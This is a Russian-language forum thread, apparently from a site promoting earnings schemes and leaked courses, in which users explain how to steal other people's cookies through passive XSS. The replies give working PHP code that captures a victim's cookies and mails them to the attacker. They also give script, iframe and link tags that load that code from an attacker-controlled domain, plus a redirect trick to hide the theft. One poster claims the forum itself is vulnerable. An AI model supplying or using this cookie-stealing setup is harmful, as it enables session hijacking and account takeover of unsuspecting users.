• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Как получить куки через пассивный XSS

Arty

Arty

Arty

Участник
Сообщения
13
Реакции
2
0 руб.
Telegram
Ibragim30 написал(а):
Всем привет. Подскажите, как можно получить cookies другого человека с помощью социальной инженерии ?
Вроде есть XSS методы ?!

Спасибо
Нажмите для раскрытия...
Юзай iframe на твой сайт, где аргументом будут куки пользователя, а на сайте сохраняй в документ или БД(по желанию)
 

Arty

Arty

Arty

Участник
Сообщения
13
Реакции
2
0 руб.
Telegram
Ibragim30 написал(а):
Сайта своего нет, интересует пассивный XSS
Нажмите для раскрытия...
А чем по твоему пассивный от активного отличается? Напиши небольшой скрипт на php, и благодаря пассивному XSS добавь на страницу тег iframe открывающий твою страницу(установи её на hostinger'е) и передающий куки как аргумент который будет сохранён.
 

Web kit

Web kit

Web kit

Новичок
Сообщения
4
Реакции
0
0 руб.
Telegram
Создаём ftp сервер / затем создаём файл index.php
Открываем пишем
PHP: 
<?php
$cookie = $_SERVER['HTTP_COOKIE'];
mail('ваша почта', 'cook', $cookie);
?>
Затем вставляем там где xss
HTML: 
<script src="https://домен.ру/index.php"></script>
Если скрипт блокинирует попробуй линк
HTML: 
<link src="домен.ру/index.php" />
 
Последнее редактирование:

Web kit

Web kit

Web kit

Новичок
Сообщения
4
Реакции
0
0 руб.
Telegram
Messiah написал(а):
Для тех, у кого атрофированы руки, и поэтому они не в состоянии пользоваться гуглом.
Можете почитать о том, что такое XSS по ссылке - https://forum.antichat.ru/threads/xss-dlja-novichkov.20140/ (не реклама)
Нажмите для раскрытия...
Да там написано как их выводить в ссылку, а как их от туда получить не написал, там надо было ставить ссылку на пхп файл, потом когда кто-то посмотрит изображение его отправят по ссылке к пхп файлу с куками на ссылке, пхп скрипт возьмет эти куки и сохранит на сервере, далее дела header('location:ссылка на изображение') - благодаря этому когда мы отправим нашу вредосную ссылку с пхп скрипом на странице всё равно будет показана наше изображение которые мы задали в header
В общем код будет такой:
PHP: 
<?php
//берем куки с ссылки
$cookie = $_SERVER['REQUEST_URI'];
//Отправляем их на нашу почту
mail('твоя почта', '123', $cookie);
//После отправки ссылки пхп файла будет показана картинка которая мы указали в header
header('Location:ссылка на картинку');
?>
 

Web kit

Web kit

Web kit

Новичок
Сообщения
4
Реакции
0
0 руб.
Telegram
Да и на вашем сайте тоже по-моему есть похожая уязвимость + у вас куки не защищены. Можно получить доступ к любому пользователю только там и си в помошь ( это не фишинг)
 
Войдите или зарегистрируйтесь для ответа.
Сверху Снизу